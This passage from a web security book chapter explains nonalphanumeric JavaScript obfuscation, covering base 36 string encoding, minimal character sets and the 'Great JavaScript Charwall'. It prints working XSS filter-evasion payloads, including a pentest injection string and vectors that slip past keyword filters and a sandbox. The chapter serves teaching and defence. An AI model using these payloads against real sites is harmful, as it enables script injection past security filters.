There are more ways to generate characters. One is to use the Number.prototype.toString method. Assuming we can get the string “toString” (which is easy with the previous trick: pass btoa the six characters with hexadecimal codes B6, 84, AD, AE, 29, and E0, some of which are unprintable) and create numbers, we can then create strings from the numbers by sending an argument to the toString method.
For example, 580049['toString'](30) will return “leet”. The way this works is very simple. The toString method of Numbers accepts an argument, which selects the base in which the number is written. So, for example, 2..toString(2) will return “10”, and 10..toString(8) will return “12”, which is the equivalent of 10 in octal.
An interesting exception is when we start sending arguments larger than 10. For example, 87..toString(11) will return “7a,” because to convert to other bases you start with the alphabet (a to z) when the numeric chars are exhausted. Therefore, on base 36 we have all numbers from 0 to 9 and all letters from a to z.
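The conversions mentioned above can be checked directly. This is a minimal sketch; the variable names are only illustrative.

```javascript
// Number.prototype.toString(radix) renders a number in the given base (2 to 36).
const leet = (580049).toString(30);  // "leet": digits l=21, e=14, e=14, t=29
const binary = (2).toString(2);      // "10"
const octal = (10).toString(8);      // "12"
const base11 = (87).toString(11);    // "7a": 7 * 11 + 10
const lastDigit = (35).toString(36); // "z", the highest digit in base 36

console.log(leet, binary, octal, base11, lastDigit);
```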
To encode with this technique, we can use the native parseInt function, which receives a string as the first argument and the base in which that string is encoded as the second argument. Therefore, parseInt("obfuscated", 36) will return the number 2469713648668501, and if we convert this number back to base 36 with toString(36), we get the string "obfuscated" again.
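The round trip can be sketched as follows. The encodeWord helper is hypothetical and written only for illustration (it is not the coauthor's snippet); it handles a single word made of the characters 0-9 and a-z.

```javascript
// Hypothetical helper: turn a short lowercase word into an expression that
// rebuilds it through Number.prototype.toString(36).
function encodeWord(word) {
  const value = parseInt(word, 36);
  // Reject anything that does not survive the round trip: long words (precision
  // is lost beyond 2^53), leading zeros, uppercase, or characters outside 0-9a-z.
  if (!Number.isSafeInteger(value) || value.toString(36) !== word) {
    throw new RangeError("cannot encode " + JSON.stringify(word));
  }
  return "(" + value + ").toString(36)";
}

const expression = encodeWord("obfuscated");
const decoded = new Function("return " + expression)();

console.log(expression); // (2469713648668501).toString(36)
console.log(decoded);    // obfuscated
```

Because JavaScript numbers are exact only up to 2^53, a single base 36 number can safely carry at most ten characters, so longer strings have to be split into several pieces and concatenated.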
A snippet of code that simplifies this was created by one of this book's coauthors, Eduardo Vela, and is available at http://sla.ckers.org/forum/read.php?2,15812,page=9#msg-22856.
Here is an example of the code in action:
>>> bs('this.string-has.been-obfu5c4t3d')
"(798868.9665787462).toString(30)+(-14615.396563741991).toString(29)+(-644372201965196).toString(31)"
>>> (798868.9665787462).toString(30)+(-14615.396563741991).toString(29)+(-644372201965196).toString(31)
"this.string-has.been-obfu5c4t3d"
The preceding code transforms a string into a piece of code which, when executed, will return the same string.
Use cases
Although the creation of nonalphanumeric code in JavaScript may appear to be nothing more than a game—a challenge meant to display the complexity and dynamics of the programming language—actual use cases do exist.
The most obvious is plain filter circumvention. Imagine a server- or client-side filter checking incoming data for certain keywords and strings which might indicate an attack, or at least the preparation of a hostile interaction. Filter mechanisms of this kind exist and are being used in the wild, although methods for detecting and circumventing them are obvious to versatile attackers. One technique is to eliminate any possible form of blacklist by simply not using any alphanumeric characters. The following example shows how a simple alert(1) would look in nonalphanumeric form. The sample was submitted by the user LeverOne on sla.ckers.org during an actual contest on nonalphanumeric JavaScript (see http://sla.ckers.org/forum/read.php?24,28687):
([,Á,È,a,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][a+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)
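To see why a keyword filter has nothing to match, it helps to evaluate the building blocks of the vector separately. The sketch below uses ordinary variable names for readability and never executes the vector itself, which relies on browser behavior of the time; the blacklist is a toy assumption, not the rule set of any particular product.

```javascript
// How the pieces of the vector evaluate.
const source = !{} + {};          // "false[object Object]"
const truthy = !!source[1] + "";  // "true", because a nonempty string is truthy
const sortName = source[3] + source[6] + truthy[1] + truthy[0];              // "sort"
const alertName = source[1] + source[2] + source[4] + truthy[1] + truthy[0]; // "alert"
const argument = -~source[1];     // -~"a" is -(~NaN), which is 1

// Toy keyword blacklist (an assumption for illustration).
const blacklist = /alert|unescape|fromCharCode/i;
const vector = "([,Á,È,a,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][a+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)";

console.log(sortName, alertName, argument); // sort alert 1
console.log(blacklist.test("alert(1)"));    // true: the plain form is caught
console.log(blacklist.test(vector));        // false: no keyword ever appears
```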
A defensive system actually checking user input for string patterns containing terms such as alert, unescape, or fromCharCode will epically fail when confronted with a vector such as this. However, it is not just Web application firewalls (WAFs) and intrusion detection systems that can be targeted and circumvented with nonalphanumeric code. JavaScript sandboxes also often experience serious trouble when dealing with these malicious snippets. One example is the Facebook FBML sandbox, which can be tested at http://developers.facebook.com/tools/.
FBML (Facebook Markup Language) is a proprietary markup dialect invented by the Facebook developers that lets users submit active markup, extended with platform-specific features, for easy creation of powerful Facebook applications. A subset of FBML is FBJS, a sandboxed approach to allowing the use and processing of user-submitted JavaScript, so that Facebook applications can have a nice look-and-feel and desktop application-like behavior. The FBJS sandbox assumes that functions are called via their alphanumeric labels, such as alert(1) or window['alert'](1). It encapsulates all method calls in specific Facebook objects and methods so that no script can be executed without the surrounding namespace context and its limitations. The primary aim is to ensure that user-submitted JavaScript cannot contain any exploits, redirections, access to sensitive user data such as document.cookie, or other information relevant in an attack scenario.
The result of a sandboxed and “secured” alert(1) would look like FB.app('0123456random.alert(1)') or something similar, depending on the sandbox release version. Nonalphanumeric characters, however, are left alone by the securing algorithm, because it would be extremely difficult to determine whether a given character is a delimiter, an operator, or another language construct. An alert(1) built with nonalphanumeric characters therefore passes through the sandboxing algorithm untouched, whereas the alphanumeric equivalent is rewritten. Without disclosing any vulnerabilities in the Facebook sandbox approach, this clearly indicates another real-life use case for code such as this.
Minimalistic sets
During a penetration test on a custom Web application in December 2009, a filter was encountered that only allowed user input matching the regular expression ^[a-zA-Z]+[^a-zA-Z]+ (normal alphabetic characters followed by nonalphabetic characters). A second filter blocked any input containing the character - or ~.
One of the places in the application where user input was reflected was in a JavaScript string, and no other filtering was taking place. This meant a string such as foo";alert(0)// would be blocked by the first filter. Fortunately, nonalphanumeric JavaScript could be used to get around this filter. This just left the second filter. Up to this point in time, most known nonalphanumeric JavaScript strings included uppercase ASCII characters and the characters - and ~. Neither would be allowed for this particular injection. On the plus side, numeric characters were not forbidden, so this made it a bit easier to develop a bypass (though it would have been possible without using any number characters, of course). After a bit of work, a suitable injection was developed:
";_=[]+!![]+![]+[][1],_+=''+/./[_[0]+_[3]+_[7]+_[0]],(1,[][_[7]+_[24]+_[1]+_[0]])()[_[5]+_[6]+_[3]+_[1]+_[0]](0);"
Having successfully executed nonalphanumeric JavaScript without ~ and -, several new questions arose: What other characters can be left out and still execute arbitrary JavaScript? What is the smallest set of nonalphanumeric characters which will allow arbitrary JavaScript to be executed? What's the smallest set of characters (with no other restrictions) that will allow arbitrary JavaScript to be executed?
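The injection shown earlier can be unpacked step by step. The sketch below keeps it as an inert string for the filter checks and rebuilds the strings it derives. Two things are assumptions: the first filter is anchored at the end of the input, and the injection is prefixed with alphabetic characters (here foo) as in the blocked example. The index arithmetic also assumes that the engine prints native functions starting with the text function test.

```javascript
// The injection from the text, kept as an inert string.
const injection = `";_=[]+!![]+![]+[][1],_+=''+/./[_[0]+_[3]+_[7]+_[0]],(1,[][_[7]+_[24]+_[1]+_[0]])()[_[5]+_[6]+_[3]+_[1]+_[0]](0);"`;

// Filters as described, with the first one anchored at the end (an assumption).
const firstFilter = (input) => /^[a-zA-Z]+[^a-zA-Z]+$/.test(input);
const secondFilter = (input) => !/[-~]/.test(input);
const passes = (input) => firstFilter(input) && secondFilter(input);

console.log(passes('foo";alert(0)//')); // false: letters reappear after the quote
console.log(passes("foo" + injection)); // true: no letters, no - and no ~

// Rebuild the strings the injection derives.
let _ = [] + !![] + ![] + [][1];             // "truefalseundefined"
const testName = _[0] + _[3] + _[7] + _[0];  // "test"
_ += "" + /./[testName];                     // append the source text of RegExp.prototype.test
const sortKey = _[7] + _[24] + _[1] + _[0];  // "sort": _[24] is the "o" of "function"
const alertKey = _[5] + _[6] + _[3] + _[1] + _[0]; // "alert"

console.log(testName, sortKey, alertKey);
```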
An obvious injection to consider for this last question is eval(name) which can execute arbitrary JavaScript. The string itself is 10 characters long, but the characters come from a set of just eight characters: a, e, l, n, m, v, (, and ). After a few hours of experimentation, it was discovered that eight characters for nonalphanumeric JavaScript would also work. The characters used were (, ), [, ], /, +, !, and , (a comma). So, this was at least as good as with full alphabetic characters! Could it be done with fewer than eight characters, though? A challenge was created at http://sla.ckers.org/forum/read.php?24,32930 to see if it could be reduced, in any browser. Sure enough, within a couple of days, the smallest character set was reduced to six characters. Shortly thereafter, other distinct sets of six characters were also found to work. Table 4.4 shows each of the known minimalistic sets.
Table 4.4 Minimalistic Sets of Nonalphanumeric JavaScript
Characters      Set Size
[ ] + ! ( )     6
[ ] + = ( )     6
[ ] + = / _     6
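When experimenting with character sets like these, it is handy to count distinct characters and to check that a candidate vector stays within an allowed set. The two helpers below are hypothetical names introduced for this sketch.

```javascript
// Hypothetical helpers for reasoning about character sets.
const distinctChars = (code) => [...new Set(code)].sort().join("");
const usesOnly = (code, allowed) => [...code].every((ch) => allowed.includes(ch));

console.log("eval(name)".length);                // 10 characters in total
console.log(distinctChars("eval(name)").length); // 8 distinct characters
console.log(usesOnly("[][[]]+[]", "[]+!()"));    // true
console.log(usesOnly("alert(1)", "[]+!()"));     // false
```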
It is believed that six is the smallest number of characters that allows arbitrary JavaScript to be executed. However, there are several ways in which a minimalistic set of five can almost be constructed. The problem of finding a set smaller than six has thus become known as the Great JavaScript Charwall.
The reason it is called a wall is that the only way to traverse objects using nonalphanumeric characters is to use []. And then, the only way my coauthors and I know to concatenate strings and create numbers is with +. This leaves us with []+ as an absolute minimal set.
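A few expressions show what the three characters [, ], and + can already produce on their own. This is a minimal sketch: the variable names and the const declarations are only there for readability, and the right-hand sides are the interesting part.

```javascript
const zero = +[];                  // 0: an empty array coerces to "" and then to 0
const one = ++[[]][+[]];           // 1: increments element 0 of [[]], which coerces to 0
const emptyText = [] + [];         // "": two arrays concatenate as strings
const undefinedText = [][[]] + []; // "undefined": a missing property cast to a string
const nanText = +[][[]] + [];      // "NaN": undefined converted to a number, then to a string
const ten = [one] + [zero];        // "10": digits are joined as strings, not added
const letterN = [[][[]] + []][+[]][++[[]][+[]]]; // "undefined"[1], which is "n"

console.log(zero, one, undefinedText, nanText, ten, letterN);
```

Numbers and a handful of letters are therefore within reach, but nothing here calls a function or assigns to a property, which is where the remaining characters come in.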
To actually execute code, we have two options:
1. Use an assignment (via node.innerHTML or location).
2. Use a function call (eval, Function, location.replace).
However, to get a reference to a node, or location, or Function, we need a reference to the global object (window), and we failed to find a way to get a reference to window with just []+=, so other chars were needed.
Option 1 requires us to use the equals sign (=), so we end up with []+=. Option 2 requires us to use (), so we end up with []+() and get a reference to Function using [].filter.constructor('code')(), where [].filter is a function and [].filter.constructor is Function. But to actually get the chars needed to write "filter", we need the strings "true" or "false", and so we need either the bang sign (!) or an equals sign (=), resulting in a total of six chars.
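Option 2 with the bang sign can be sketched as follows. The right-hand sides of the letter definitions use only the six characters [ ] + ! ( ); the variable names, the literal "constructor", and the sample code string are shortcuts taken for readability, since a full vector would have to spell those out character by character as well.

```javascript
const f = (![] + [])[+[]];                                 // "false"[0]
const i = ([][[]] + [])[!![] + !![] + !![] + !![] + !![]]; // "undefined"[5]
const l = (![] + [])[!![] + !![]];                         // "false"[2]
const t = (!![] + [])[+[]];                                // "true"[0]
const e = (!![] + [])[!![] + !![] + !![]];                 // "true"[3]
const r = (!![] + [])[+!![]];                              // "true"[1]

const filterName = f + i + l + t + e + r;                  // "filter"
const FunctionRef = [][filterName]["constructor"];         // the Function constructor
const result = FunctionRef("return 6 * 7")();              // runs code supplied as a string

console.log(filterName, FunctionRef === Function, result);
```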
Another possibility is to use []+=/_ and get the reference to window using []['__parent__']. This has proven to be the character set that can create the smallest arbitrary codes. We construct the _ by using /_/ as a regular expression and concatenating it with an empty array to cast it to a string, "/_/". We then take the character in position 1 with [/_/+[]][+[]][++[[]][+[]]], build the property name from it, get location from window, and assign it a controlled value.
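The construction of the underscore can be checked in isolation. The sketch only builds the property name and does not depend on __parent__ existing in the engine that runs it; the literal "parent" is a shortcut for readability.

```javascript
const regexText = /_/ + [];                      // "/_/": the regular expression cast to a string
const indexOne = ++[[]][+[]];                    // 1
const underscore = [/_/ + []][+[]][++[[]][+[]]]; // character 1 of "/_/", which is "_"

// Building the property name (the word "parent" is written out for readability).
const parentKey = underscore + underscore + "parent" + underscore + underscore;

console.log(regexText, indexOne, underscore, parentKey);
```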
Minimizing the character set used to execute arbitrary JavaScript unfortunately tends to greatly lengthen the vectors. The shortest known vector, at the time of this writing, was contributed by LeverOne. The 460-character-long vector is:
[___=[[_=[]]==_]+_[__=/_/+_]][_____=[_____=__[++_]+__[_]]+[/_/[_______=[______=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_]]+[____=____[_+_]]+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+______+__[+[]]+____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[_=+[]]+_____][___[++_+_]+____+______+___[_]+__[+[]]+___[_+[+[]]]+____+ ___[++_+_+_]]=[__=_[_______]+_][_____][__[_]+___[_/_]+__[_/_+[_/_]]+___[_+_]]
Is this the shortest possible vector using just six characters? Probably not. An entertaining exercise is to see if you can find a shorter version using any set of six characters. While you are at it, you just might break the Great JavaScript Charwall too!
Summary
The great thing about nonalphanumeric code is that you learn the innermost workings of the language. If you are attempting to write a sandbox or deobfuscate some malicious code, you need to learn the most extreme methods of hiding source code. You cannot write something good without knowing how to be evil first. The lessons learned in this chapter should keep you ahead of the game, improve your knowledge, and teach you how to hunt for creative ways to obfuscate.
We hope you have enjoyed looking at nonalphanumeric code. Now that you know how it works, why not experiment and come up with something new that we have not thought about? We are always on sla.ckers.org looking for interesting discussions; who knows, you might even break “The Wall” (but we doubt it).